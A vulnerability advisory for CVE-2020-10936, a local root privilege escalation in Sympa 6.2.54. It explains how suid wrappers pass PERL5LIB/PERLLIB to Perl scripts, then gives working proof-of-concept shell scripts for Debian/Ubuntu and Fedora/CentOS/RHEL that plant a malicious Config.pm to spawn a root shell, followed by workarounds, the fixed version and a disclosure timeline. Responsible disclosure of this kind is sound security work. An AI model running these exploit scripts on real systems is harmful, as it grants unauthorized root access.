Description

Sympa is an electronic mailing list manager.

It is used to automate list management functions such as subscription, moderation and management of archives. Sympa also manages sending of messages to the lists, and makes it possible to reduce the load on the system. Provided that you have enough memory on your system, Sympa is especially well adapted for big lists.

Threat

Privilege escalation to root

Vulnerability records

CVE ID: CVE-2020-10936

Access Vector: local

Security Risk: high

Vulnerability: CWE-269

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Details

When installing sympa on CentOS/Fedora/RHEL, several binaries are set with the suid/sgid bit:

[[email protected] ~]$ ls -lah /usr/libexec/sympa/
[...]
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 bouncequeue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 familyqueue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 queue
-rwsr-x---.  1 root  sympa  16K 23 janv. 09:46 sympa_newaliases-wrapper
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 sympa_soap_server-wrapper.fcgi
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 wwsympa-wrapper.fcgi

As you can see, only the sympa_newaliases-wrapper binary is suid root.

However, this binary is not world-executable. Only users from the sympa group are allowed to execute this program, and this is not our case.

So, in order to be able to execute this program, we need to perform a privileges escalation to the sympa user.

If we look at the wwsympa-wrapper.fcgi setuid/setgid sympa source code, we can see that the main function execute the WWSYMPA binary (wwsympa.fcgi) as the sympa user and group.

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid()); // Added to fix the segfault
    setregid(getegid(),getegid()); // Added to fix the segfault
    argv[0] = WWSYMPA;
    return execve(WWSYMPA,argv,envp);
}

The vulnerability is caused by the envp variable that is passed to the WWSYMPA binary.

It means that every environment variable defined when running the wwsympa-wrapper.fcgi is passed to wwsympa.fcgi.

As wwsympa.fcgi is interpreted as a PERL script, the interpreter will look at the PERLLIB and PERL5LIB environment variable to look for Perl modules.

So, if we can create a malicious Perl module, the PERL interpreter will look in the PERLLIB and PERL5LIB path, and if a module name matches, it will load it.

We came up with the following POC that allows us to escalate our privileges as sympa, by creating a malicious Config perl module:

$ id
uid=1000(sysdream) gid=1000(sysdream) groupes=1000(sysdream),10(wheel) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ mkdir /tmp/poc
$ echo 'exec("/bin/bash");' > /tmp/poc/Config.pm
$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/libexec/sympa/wwsympa-wrapper.fcgi
bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

As we are now the sympa user, we are allowed to execute the sympa_newaliases-wrapper suid-root binary. Let's take a look at the source code:

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid());
    setregid(getegid(),getegid());
    argv[0] = SYMPA_NEWALIASES;
    return execve(SYMPA_NEWALIASES, argv, envp);
}

SYMPA_NEWALIASES point to sympa_newaliases.pl, which is also a Perl script!

If we use the same POC as before, we could gain root privilege escalation as root.

bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-5.0$ echo $PERLLIB
/tmp/poc
bash-5.0$ echo $PERL5LIB
/tmp/poc
bash-5.0$ /usr/libexec/sympa/sympa_newaliases-wrapper
[[email protected] poc]# id
uid=0(root) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[[email protected] poc]# whoami
root

On Debian/Ubuntu systems, /usr/lib/sympa/bin/sympa_newaliases-wrapper is already suid root and world-executable, which means that we don't have to escalate to sympa in order to gain root privileges:

[email protected]:~$ ls -lah /usr/lib/sympa/bin/sympa_newaliases-wrapper
-rwsr-xr-x 1 root root 14K janv. 20  2019 /usr/lib/sympa/bin/sympa_newaliases-wrapper
[email protected]:~$ mkdir /tmp/poc && echo 'exec("/bin/sh")' >> /tmp/poc/Config.pm
[email protected]:~$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/lib/sympa/bin/sympa_newaliases-wrapper 
# whoami
root
# 

Proof of Concept : Root privilege escalation - Debian / Ubuntu

Standard user to root privileges:

#!/bin/sh
echo "[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
echo 'exec("/bin/sh");' > $EXPLOITFILE
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/lib/sympa/bin/sympa_newaliases-wrapper

Output:

[email protected]:~$ bash poc.sh 
[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
# whoami
root

Proof of Concept : Root privilege escalation - Fedora / CentOS / RedHat

Standard user, to sympa, to root privilege escalation:

#!/bin/sh
echo "[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
cat > $EXPLOITFILE <<"EOL"
my $sympauser = "sympa";
my $pwuid = getpwuid( $< );
$elevate = $pwuid eq $sympauser;
$root = $pwuid eq "root";
if ($elevate == 1)
{
    print "[+] Running as service user, elevating privileges as root...\n";
    exec("/usr/libexec/sympa/sympa_newaliases-wrapper");
}
else {
    if ($root == 1)
    {
        print "[+] Running as root, popping shell.\n";
        exec("/bin/sh");
    }
    else
    {
        print "[!] Not running as root/sympa, exploit failed.\n";
    }
}
EOL
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/libexec/sympa/wwsympa-wrapper.fcgi

Output:

[[email protected] exploit]$ bash poc.sh 
[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
[+] Running as service user, elevating privileges as root...
[+] Running as root, popping shell.
sh-5.0# whoami
root

Affected versions

  • Sympa 6.2.54

Workarounds

Sympa suggests the following workarounds:

  • Stop using FastCGI wrappers and remove them

    1. Modify configuration for HTTP server so that it will not use the wrapper. For detailed instructions see:

    2. Remove executable files of FastCGI wrappers:

      • $EXECCGIDIR/wwsympa-wrapper.fcgi
      • $EXECCGIDIR/sympa_soap_server-wrapper.fcgi
  • No workaround has been known about some obsoleted systems requiring FastCGI wrapper, in particular Apache HTTP Server 2.2.x and earlier.

Solution

Sympa suggests to:

  • Upgrade to version 6.2.56

    • Source distribution: sympa-6.2.56.tar.gz
    • Binary distributions: Check release information by distributors.

or, if you have installed Sympa using earlier version of source distribution,

Timeline

  • 2020-03-12 Initial discovery
  • 2020-03-24 Contacting the developpers
  • 2020-03-24 Aknownledgment from the Sympa security team
  • 2020-04-03 Feedback with a proposed patch, but not to be applied to all SUID binaries.
  • 2020-04-16 We confirm that the patch seems efficient, but it would be better to apply it on all binaries.
  • 2020-04-24 Response: setuid-sympa wrappers are deprecated, so they should not be used in the first place.
  • 2020-05-04 Follow-up e-mail about a release date for the patch and that our disclosure target is on 2020-05-13.
  • 2020-05-18 No reply, last follow-up.
  • 2020-05-21 Reply with draft advisory.
  • 2020-05-25 Disclosure with provided solutions and workarounds.

Credits to the Sympa team for the quick and efficient handling of our report.

In particular, thanks to Soji Ikeda for his work and patch development.

Credits

  • Nicolas Chatelain, Sysdream (n.chatelain -at- sysdream -dot- com)